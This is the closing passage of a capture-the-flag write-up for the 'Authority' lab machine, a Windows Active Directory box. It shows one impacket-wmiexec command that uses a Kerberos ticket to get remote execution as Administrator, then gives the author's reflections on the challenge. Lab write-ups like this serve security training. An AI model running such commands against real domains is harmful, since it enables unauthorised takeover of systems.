run one of impacket tools that suits the ports you have access impacket-wmiexec -k -no-pass AUTHORITY.HTB/Administrator@authority.authority.htb

Closing Thoughts

Authority is an interesting take on Windows and Active Directory attacks, it demonstrates a mix of known techniques and a niche pathways that I was not familiar with. It took a seemingly trivial AD privilege escalation and introduced a number of fun challenges that made the box interesting at each part of completion.